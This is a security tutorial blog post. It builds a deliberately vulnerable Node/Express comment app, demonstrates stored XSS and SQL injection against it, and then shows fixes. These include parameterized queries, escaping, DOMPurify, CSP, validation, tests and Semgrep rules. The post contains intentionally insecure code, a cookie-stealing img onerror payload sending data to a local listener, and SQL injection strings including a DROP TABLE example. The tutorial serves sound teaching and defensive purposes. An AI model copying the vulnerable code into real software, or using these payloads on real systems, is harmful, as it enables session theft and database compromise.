
I Finally Understood XSS and SQL Injection After Seeing This Demo


A hands-on demo that makes the mechanics of XSS and SQL injection impossible to forget and shows the exact fixes you should apply today.

Introduction

I used to explain XSS and SQL injection with diagrams and slides. People would nod, jot notes, then go back to code and never change habits.

Everything clicked the day I built a tiny vulnerable app and then exploited it in a controlled demo. Seeing the payload run in the browser and watching a crafted input leak rows from the database turned abstract warnings into obvious anti-patterns.

This article walks through that exact demo: the vulnerable code (frontend + backend), how the exploit works step-by-step, and the fixes you apply immediately. You will learn:

  • The minimal vulnerable code that makes XSS and SQLi possible
  • How attackers craft payloads and why those payloads succeed
  • Safe, copy-paste fixes (server-side and client-side)
  • How to test and automate checks so this never sneaks back in

I will not assume prior mastery. If you follow the demo locally (staging only, never test exploits against production or systems you do not own), you will understand these attacks at a visceral level and leave with practical defenses.


1. The Demo Overview: What I Built and Why

Goal: build the smallest possible full-stack app that demonstrates both vulnerabilities.

Stack (minimal, easy to run locally):

  • Backend: Node.js + Express + Postgres (or SQLite for local)
  • Frontend: simple HTML + vanilla JS (or React)
  • Purpose: a microblog with a comment form and an admin search panel

Why this layout? Because it hits the common real-world patterns: user input saved to a database and then rendered back to other users, and a search/lookup route that reads DB rows based on arbitrary input.

The demo intentionally contains two problems:

  1. Unsafe rendering on the frontend (no escaping / innerHTML use) → Stored XSS.
  2. Unsafe SQL construction on the backend (string concatenation) → SQL injection.

This is a minimal but realistic setup that mirrors many real apps.


2. Vulnerable Code: Backend (Express + Postgres)

Here is a single-file app.js that implements the vulnerable endpoints. Run it only in a local dev/staging environment.

// app.js (vulnerable demo)
const express = require('express');
const bodyParser = require('body-parser');
const { Client } = require('pg'); // or use sqlite for a local quick start

const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

const client = new Client({
  connectionString: process.env.DATABASE_URL || 'postgres://localhost:5432/demo',
});
client.connect();

// Create table (run once)
async function init() {
  await client.query(`
    CREATE TABLE IF NOT EXISTS comments (
      id SERIAL PRIMARY KEY,
      author TEXT,
      content TEXT
    );
  `);
}
init();

// Save comment - insecure (demonstrates SQLi)
app.post('/comments', async (req, res) => {
  const { author, content } = req.body;
  // Vulnerable: string concatenation
  const sql = `INSERT INTO comments (author, content) VALUES ('${author}', '${content}') RETURNING id`;
  try {
    const result = await client.query(sql);
    res.json({ id: result.rows[0].id });
  } catch (err) {
    console.error(err);
    res.status(500).send('DB error');
  }
});

// List comments (rendered by frontend)
app.get('/comments', async (req, res) => {
  const result = await client.query('SELECT id, author, content FROM comments ORDER BY id DESC LIMIT 50');
  res.json(result.rows);
});

// Admin search - insecure (demonstrates SQLi)
app.get('/admin/search', async (req, res) => {
  const q = req.query.q || '';
  // Vulnerable: directly interpolating user input into SQL
  const sql = `SELECT id, author, content FROM comments WHERE content ILIKE '%${q}%' LIMIT 100`;
  const result = await client.query(sql);
  res.json(result.rows);
});

app.listen(3000, () => console.log('Listening on 3000'));

Two unsafe patterns to notice:

  • The INSERT interpolates '${author}' and '${content}' directly, so a single quote in either field breaks out of the string literal and changes the query.
  • The search interpolates the user's term into ILIKE '%${q}%', making the term part of the SQL text itself.
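To see the first pattern concretely, here is a quick sketch (plain Node, no database needed) that rebuilds the same INSERT string with a hostile author value. The quote in the input closes the SQL string literal early:

```javascript
// Rebuild the vulnerable INSERT string to inspect what the DB would receive.
function buildInsert(author, content) {
  return `INSERT INTO comments (author, content) VALUES ('${author}', '${content}') RETURNING id`;
}

const benign = buildInsert('Alice', 'Hello');
const hostile = buildInsert("a', 'x'); DROP TABLE comments; --", 'ignored');

console.log(benign);
console.log(hostile);
// The hostile string closes the VALUES list itself, smuggles in a second
// statement, and hides the original tail behind a -- comment.
```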

3. Vulnerable Code: Frontend (simple HTML + JS)

Save this simple page as index.html; it submits comments and renders them unsafely.

<!-- index.html (vulnerable demo) -->
<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Vulnerable Demo</title>
</head>
<body>
  <h1>Comments</h1>
  <form id="commentForm">
    <input name="author" placeholder="Your name" /><br/>
    <textarea name="content" placeholder="Write a comment"></textarea><br/>
    <button type="submit">Post</button>
  </form>

  <div id="comments"></div>

  <script>
    async function loadComments() {
      const res = await fetch('/comments');
      const rows = await res.json();
      const container = document.getElementById('comments');
      container.innerHTML = ''; // unsafe rendering
      rows.forEach(r => {
        // Unsafe: injecting user content as HTML
        const div = document.createElement('div');
        div.innerHTML = `<strong>${r.author}</strong>: ${r.content}`;
        container.appendChild(div);
      });
    }

    document.getElementById('commentForm').addEventListener('submit', async (e) => {
      e.preventDefault();
      const form = e.target;
      const author = form.author.value;
      const content = form.content.value;
      await fetch('/comments', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ author, content })
      });
      form.reset();
      loadComments();
    });

    loadComments();
  </script>
</body>
</html>

innerHTML plus template interpolation is the problem: anything stored as content is parsed as HTML by the browser, including whatever markup an attacker submits.


4. Exploiting the Demo: Stored XSS Walkthrough

With the demo running locally, perform this safe experiment:

  1. Open the app in your browser (localhost:3000).
  2. Post a regular comment: author = Alice, content = Hello.
  3. Post an exploit comment:
     author = Mallory
     content = <img src=x onerror="fetch('http://localhost:9999/steal?c=' + encodeURIComponent(document.cookie))">
     (Browsers do not execute <script> tags inserted via innerHTML, so the payload uses an event handler that fires when the broken image fails to load.)
  4. In a second terminal, start a small server to observe stolen cookies (only on staging/local):
# quick and dirty server to log incoming requests on port 9999
python3 -m http.server 9999
# Or use a small express app that logs queries

  5. Load the comments page in a second browser (or an incognito window) as a non-admin user. The fetch() runs and the request appears in the port 9999 log, demonstrating that the payload executed in another user's browser context.

Why it works:

  • The malicious markup was stored in the DB by the POST.
  • When the page renders, the frontend uses innerHTML, so the browser parses the markup and runs the event handler.
  • This allows session theft, DOM manipulation, and more.

This is stored XSS. It persists in the database and runs whenever any user views the comment.


5. Exploiting the Demo: SQL Injection Walkthrough

Now test SQLi. On the vulnerable admin route, /admin/search?q=... try queries that reveal DB behavior.

Simple test to cause an error or return extra rows:

  • Request: GET /admin/search?q=' OR '1'='1

Because the server builds ILIKE '%${q}%', this becomes:

SELECT id, author, content FROM comments WHERE content ILIKE '%' OR '1'='1%' LIMIT 100

Here the query is still syntactically valid, and ILIKE '%' alone matches every row, so the route dumps the entire table. Other inputs (a lone single quote, for example) leave an unterminated string literal and produce a syntax error; error messages like that can reveal column names and let an attacker iterate toward extracting data. More targeted exploits use PostgreSQL-specific constructs (only in authorized testing).
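You can verify the "a single quote breaks it" claim without a database: rebuild the search string and count the quotes, since an odd count means an unterminated SQL string literal. A minimal sketch:

```javascript
// Rebuild the vulnerable search-string construction from /admin/search.
const buildSearch = (q) =>
  `SELECT id, author, content FROM comments WHERE content ILIKE '%${q}%' LIMIT 100`;

const broken = buildSearch("O'Brien"); // an innocent name is enough
const quoteCount = (broken.match(/'/g) || []).length;

console.log(broken);
console.log('quotes:', quoteCount); // odd count -> Postgres rejects the statement
```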

Another demonstration (stacked queries, local only): use q = '; SELECT version(); -- to show that arbitrary SQL can be appended. Whether the stacked statement actually runs depends on the driver and database, so it is not guaranteed in this naive demo, but the principle is clear.

Why it works:

  • The SQL string is built by concatenating untrusted input.
  • The DB executes the final string with the injected segments interpreted as SQL.
  • Attackers can modify the query structure to read, change, or delete data.

6. The Fixes: Server Side (Parameterized Queries)

Replace unsafe concatenation with parameterized queries. For pg:

// safe insert
app.post('/comments', async (req, res) => {
  const { author, content } = req.body;
  const sql = 'INSERT INTO comments (author, content) VALUES ($1, $2) RETURNING id';
  try {
    const result = await client.query(sql, [author, content]);
    res.json({ id: result.rows[0].id });
  } catch (err) {
    console.error(err);
    res.status(500).send('DB error');
  }
});

// safe search using a parameterized LIKE pattern
app.get('/admin/search', async (req, res) => {
  const q = req.query.q || '';
  const sql = 'SELECT id, author, content FROM comments WHERE content ILIKE $1 LIMIT 100';
  const result = await client.query(sql, [`%${q}%`]);
  res.json(result.rows);
});

Why this works:

  • The SQL statement and parameters are sent separately to the DB driver.
  • The driver treats parameter values strictly as data, never as SQL tokens.
  • No matter what q contains, it cannot change SQL grammar.

If you use an ORM (Prisma, TypeORM, Sequelize), prefer ORM query methods or parameter bindings rather than raw SQL strings. If raw SQL is unavoidable, build it with proper identifier whitelists and parameterize values.
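Values can always be bound, but identifiers (table and column names) cannot be bind parameters, which is why the whitelist approach is needed. A hypothetical sketch (the SORTABLE set and buildSearchSql helper are illustrative, not part of the demo app):

```javascript
// Identifiers can't be sent as bind parameters, so validate them against a
// whitelist and still bind the value with $1 as usual.
const SORTABLE = new Set(['id', 'author']);

function buildSearchSql(sortColumn) {
  const col = SORTABLE.has(sortColumn) ? sortColumn : 'id'; // never interpolate raw input
  return `SELECT id, author, content FROM comments WHERE content ILIKE $1 ORDER BY ${col} DESC LIMIT 100`;
}

console.log(buildSearchSql('author'));
console.log(buildSearchSql('author; DROP TABLE comments; --')); // falls back to id
```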


7. The Fixes: Client Side (Escaping & Sanitization)

Change the frontend to never inject raw HTML. Two options:

Option A: Render as text (recommended when HTML is not required)

// replace innerHTML usage
rows.forEach(r => {
  const div = document.createElement('div');
  // Use text nodes instead of HTML injection
  const strong = document.createElement('strong');
  strong.textContent = r.author;
  div.appendChild(strong);
  div.appendChild(document.createTextNode(': ' + r.content));
  container.appendChild(div);
});

Option B: If you must allow limited HTML (rich text), sanitize before rendering

Use DOMPurify on the server or client:

// sanitize on the client (if HTML allowed)
import DOMPurify from 'dompurify';
// small helper to escape plain-text fields before interpolation
const escapeHtml = (s) => s.replace(/[&<>"']/g,
  (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
div.innerHTML = `<strong>${escapeHtml(r.author)}</strong>: ${DOMPurify.sanitize(r.content)}`;

Prefer server-side sanitization for stored HTML to avoid storing unsafe content in the DB. Use a strict allowlist (tags and attributes) and disallow on* event handlers, javascript: URIs, and <iframe>.

Also, set security headers:

// Example CSP header (adjust to your app)
res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'; object-src 'none';");

Cookies:

  • Mark cookies HttpOnly to prevent JavaScript access: res.cookie('sid', token, { httpOnly: true, secure: true })
  • Use SameSite as appropriate.
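The header settings above can be bundled into one small Express middleware. A sketch (the securityHeaders name is mine; the helmet package covers the same ground with more options):

```javascript
// Set baseline security headers on every response.
// Mount with: app.use(securityHeaders)
function securityHeaders(req, res, next) {
  res.setHeader('Content-Security-Policy',
    "default-src 'self'; script-src 'self'; object-src 'none';");
  res.setHeader('X-Content-Type-Options', 'nosniff'); // stop MIME sniffing
  res.setHeader('Referrer-Policy', 'no-referrer');
  next();
}
```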

8. Input Validation: Defense in Depth

Parameterizing SQL and escaping output are the critical fixes, but add input validation as a further line of defense.

Use Zod or Joi on the server:

import { z } from 'zod';

const commentSchema = z.object({
  author: z.string().min(1).max(100),
  content: z.string().min(1).max(2000),
});

app.post('/comments', async (req, res) => {
  const parse = commentSchema.safeParse(req.body);
  if (!parse.success) return res.status(400).json({ error: 'Invalid input' });
  const { author, content } = parse.data;
  // ...then run the parameterized INSERT from section 6
});

Validation prevents oversized payloads, rejects suspicious types, and makes it harder to craft certain automated attacks.


9. Testing the Fixes: Unit, Integration, and E2E

Add tests to ensure bugs do not reappear.

Unit / Integration (Jest + Supertest):

test('script tags in content are not stored as executable markup', async () => {
  await request(app).post('/comments').send({ author: 'A', content: '<script>alert(1)</script>' });
  const res = await request(app).get('/comments');
  expect(res.status).toBe(200);
  // If you sanitize on the server, assert the tag is gone; if you only render
  // as text on the client, assert non-execution in an E2E test instead.
  expect(res.body.some(c => c.content.includes('<script>'))).toBe(false);
});

test('search parameter is parameterized and safe', async () => {
  const res = await request(app).get('/admin/search?q=%27%20OR%20%271%27=%271');
  expect(res.status).toBe(200); // a quote in q must not break the query
});

E2E (Cypress):

  • Insert a malicious comment into the DB directly (simulate stored XSS) and assert the page does not execute it.
  • Test that admin/search returns appropriate results and not DB errors.

Run these tests in CI on staging. Failing tests should block merges.


10. Static Analysis and CI Automation

To prevent regressions, add automated checks:

  1. Semgrep rules to detect common anti-patterns:
     • Flag innerHTML, dangerouslySetInnerHTML, and eval usage.
     • Flag string concatenation used in DB queries.
  2. CodeQL to scan for injection patterns.
  3. Dependency scanning (Snyk, Dependabot) to keep libs updated.
  4. SAST on PRs to detect dangerous constructs early.

Example Semgrep rule (pattern to detect SQL concatenation in JS):

rules:
  - id: js-sql-concat
    pattern: |
      client.query("... " + $X + " ...")
    message: "Possible SQL concatenation; use parameterized queries."
    languages: [javascript]
    severity: WARNING

Add these checks to GitHub Actions so PRs fail on violations.


11. Runtime Protections (Defense In Depth)

Even with code fixes, add run-time protections:

  • WAF (Cloudflare, AWS WAF) to block obvious attack payloads.
  • CSP reporting to collect violations (report-uri).
  • WAF logging + SIEM to detect scanning and probing patterns.
  • Rate limiting to reduce automated scraping or brute force.
  • Monitor DB errors; frequent SQL errors from malformed inputs often indicate scanning.

Remember: runtime protections do not replace correct coding; they supplement it.
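To make the rate-limiting bullet concrete, here is a minimal fixed-window limiter sketch (in-memory and illustrative only; a package like express-rate-limit is the usual production choice):

```javascript
// Fixed-window limiter: at most `limit` requests per client IP per `windowMs`.
// Mount per route, e.g. app.use('/admin/search', rateLimiter({ limit: 30 })).
function rateLimiter({ windowMs = 60000, limit = 60 } = {}) {
  const hits = new Map(); // ip -> { count, windowStart }
  return (req, res, next) => {
    const now = Date.now();
    let entry = hits.get(req.ip);
    if (!entry || now - entry.windowStart >= windowMs) {
      entry = { count: 0, windowStart: now }; // new window for this client
      hits.set(req.ip, entry);
    }
    entry.count += 1;
    if (entry.count > limit) return res.status(429).send('Too many requests');
    next();
  };
}
```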


12. Responsible Testing Warning

A repeated note: never run exploit tools or attack tests against production or systems you do not own. Use a local sandbox or authorized staging environment. Unauthorized probing is illegal and unethical.

For learning: create throwaway local databases, isolated VMs, or containerized environments specifically for security testing.


13. Checklist: What You Must Do Right Now

If you have a web app, run through this checklist immediately:

  1. Search for innerHTML, dangerouslySetInnerHTML, eval, new Function in your codebase. Replace or audit each use.
  2. Search for raw SQL string concatenation patterns. Replace with parameterized queries or ORM bindings.
  3. Add server-side input validation (Zod, Joi, Yup).
  4. Sanitize any user-submitted HTML with DOMPurify or sanitize-html, with a strict tag/attribute allowlist.
  5. Add tests that assert malicious payloads are sanitized and do not execute.
  6. Add Semgrep/CodeQL rules to the project and run them on PRs.
  7. Set CSP, secure cookies (HttpOnly, Secure, SameSite), and redirect to HTTPS.
  8. Add rate limits and WAF rules for public endpoints.

14. Why Seeing It Live Changes Everything

Why did the demo work so well for me? Because it turned abstract rules into cause and effect:

  • Stored XSS became obvious when a payload I posted to the DB ran in another browser.
  • SQLi became obvious when a single quote, or ' OR '1'='1, visibly changed the DB's behavior.
  • The fixes became obvious because the same tiny changes eliminated the exploit immediately.

A diagram or slide can explain the theory, but a controlled demo builds an unshakable intuition.


Conclusion

XSS and SQL injection aren’t theoretical threats from mysterious attackers. They are predictable outcomes of mixing data with code and failing to enforce boundaries.

If you want to truly understand these vulnerabilities, build the smallest vulnerable demo locally, exploit it in a controlled way, and then fix it. The experiential loop of break → observe → fix cements the right habits faster than any lecture.

Run through the checklist above. Add automated tests and static checks to CI. Teach teammates to avoid the anti-patterns. And the next time someone claims “our code is probably safe,” ask to see the demo.


Call to Action

If you want to take this further, I can follow up with:

  • Provide a sanitized version of the demo ready to git clone and run locally (with scripts for SQLite to avoid Postgres setup).
  • Generate Semgrep rules tailored to your stack (Node/Express, Django, Rails, etc.).
  • Produce a one-page cheat sheet to pin in your repo (SECURITY_CHECKLIST.md) with the exact commands and test cases shown here.
